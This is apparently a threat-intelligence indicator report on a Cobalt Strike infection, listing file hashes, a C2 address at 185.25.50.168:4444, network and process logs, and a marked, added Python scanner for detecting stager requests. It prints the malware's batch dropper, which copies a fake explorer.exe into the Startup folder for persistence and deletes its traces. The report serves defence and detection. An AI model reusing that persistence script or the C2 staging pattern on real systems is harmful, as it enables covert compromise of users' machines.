#cobaltstrike_210319

VRad, Mar 22nd, 2019 (edited)
#IOC #OptiData #VR #cobaltstrike #SFX #BAT

https://pastebin.com/hbxkBA9n

FAQ:
https://www.cobaltstrike.com/features
https://www.youtube.com/watch?v=rqOG_oyYbvs
https://pypi.org/project/pyconfig/
https://blog.cobaltstrike.com/2014/06/12/cobalt-strike-innovative-offense-or-just-a-gui/

attack_vector
--------------
EXE (SFX) > .bat > Startup\explorer.exe

email_headers
--------------
n/a

files
--------------
SHA-256     fb7f4162ee59ee2b23606bb50c560a8010df95d3746c79b13f8200de05e934ad
File name   explorer.exe
File size   4.58 MB (4797547 bytes)

SHA-256     1acb5b19209c8b11aceb40b5d5da4a53505f1180bd0e0ea1886c8b8159af35b1
File name   Nd9q
File size   205.09 KB (210011 bytes)

SHA-256     2f16567c59e964e2eb583a1aa749a08255db10685b087b2dffc154d165f4f4e9
File name   pyconfig.h
File size   21.31 KB (21821 bytes)

SHA-256     ce559f72bf1fc7b72f3db4b814320d3902f607098c06141901277a07976b59f7
File name   python34.dll
File size   2.62 MB (2744832 bytes)

activity
**************

bat_file
--------------
@echo off
copy explorer.exe "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"
cd "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\"
start explorer.exe
cd %~dp0
del 1.rar.exe
del explorer.exe
del link_site.bat
exit

C2:
http://185.25.50.168:4444/Nd9q

netwrk
--------------
185.25.50.168   185.25.50.168:4444  GET /Nd9q HTTP/1.1  Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;)
185.25.50.168   185.25.50.168:4444  GET /cx HTTP/1.1    Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1;)
185.25.50.168   185.25.50.168:4444  GET /cx HTTP/1.1    Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1;)
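
Added detection example, not part of the original paste: a small Python scanner that runs over log lines shaped like the netwrk section above and flags two things, the C2 endpoint listed in this paste (185.25.50.168:4444) and stager-style URIs. Cobalt Strike, like Metasploit, generates HTTP stager paths whose "checksum8" (sum of the ASCII byte values mod 256) is 92 for x86 or 93 for x64; the first request here, /Nd9q, satisfies that (checksum 92), while the later /cx beacon requests do not. The log field order is an assumption modelled on the paste, and the benign third sample line (203.0.113.10, a TEST-NET address) is constructed.

```python
"""Flag proxy/network log lines that match the #cobaltstrike_210319 IOCs.

Added example, not code from the original paste. Assumed log layout
(modelled on the paste's "netwrk" section; real proxy logs need their own parser):
  <dst_ip> <dst_ip:port> <method> <uri> <http_version> <user_agent>
"""
import re
from dataclasses import dataclass

# C2 endpoint taken from the paste.
IOC_C2 = {("185.25.50.168", 4444)}

# Cobalt Strike / Metasploit HTTP stagers request a URI whose checksum8
# (sum of ASCII byte values mod 256) is 92 for x86 or 93 for x64.
STAGER_CHECKSUMS = {92: "x86", 93: "x64"}

LINE_RE = re.compile(
    r"^(?P<ip>\d+\.\d+\.\d+\.\d+)\s+"
    r"(?P<host>\d+\.\d+\.\d+\.\d+):(?P<port>\d+)\s+"
    r"(?P<method>[A-Z]+)\s+(?P<uri>\S+)\s+HTTP/\d\.\d\s+"
    r"(?P<ua>.*)$"
)


@dataclass
class Hit:
    line_no: int
    reasons: list


def checksum8(uri: str) -> int:
    """Sum of the byte values of the URI path (leading '/' and query removed), mod 256."""
    path = uri.lstrip("/").split("?", 1)[0]
    return sum(path.encode("ascii", "ignore")) % 256


def stager_arch(uri: str):
    """Return 'x86' / 'x64' if the URI path looks like a stager checksum8 path, else None."""
    return STAGER_CHECKSUMS.get(checksum8(uri))


def scan_lines(lines):
    """Return a Hit for every parsable line that matches the C2 IOC or a stager-style URI."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # unparsable line: skip rather than guess
        reasons = []
        if (m["host"], int(m["port"])) in IOC_C2:
            reasons.append(f"C2 IOC {m['host']}:{m['port']}")
        arch = stager_arch(m["uri"])
        if arch:
            reasons.append(f"checksum8 stager URI {m['uri']} ({arch})")
        if reasons:
            hits.append(Hit(n, reasons))
    return hits


# Constructed sample: two lines copied from the paste's format plus one benign line.
SAMPLE_LOG = [
    "185.25.50.168   185.25.50.168:4444  GET /Nd9q HTTP/1.1  Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;)",
    "185.25.50.168   185.25.50.168:4444  GET /cx HTTP/1.1    Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1;)",
    "203.0.113.10    203.0.113.10:80     GET /index.html HTTP/1.1  Mozilla/5.0",
]

if __name__ == "__main__":
    for h in scan_lines(SAMPLE_LOG):
        print(h.line_no, "; ".join(h.reasons))
```

The checksum8 test is a hunting heuristic, not proof: any short random path hits 92 or 93 about 1 in 128 times, so use it to prioritise review of first-contact GETs to unfamiliar hosts rather than as a standalone block rule; the IP:port match is the hard IOC from this paste.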

comp
--------------
explorer.exe    1236    TCP localhost   50093   185.25.50.168   4444    CLOSE_WAIT

proc
--------------
C:\Windows\system32\cmd.exe cmd /c ""C:\Users\operator\Desktop\1\link_site.bat" "
C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.exe
C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.exe

persist
--------------
C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup             19.03.2019 15:59   explorer.exe
c:\users\operator\appdata\roaming\microsoft\windows\start menu\programs\startup\explorer.exe        01.01.1970 2:00

drop
--------------
C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.exe

%temp%\_MEI22402\Include\pyconfig.h
%temp%\_MEI22402\python34.dll
%temp%\_MEI22402\MSVCR100.dll
%temp%\_MEI22402\_ssl.pyd
%temp%\_MEI22402\_socket.pyd
%temp%\_MEI22402\unicodedata.pyd
%temp%\_MEI22402\unicodedata.pyd
%temp%\_MEI22402\...

# # #

VR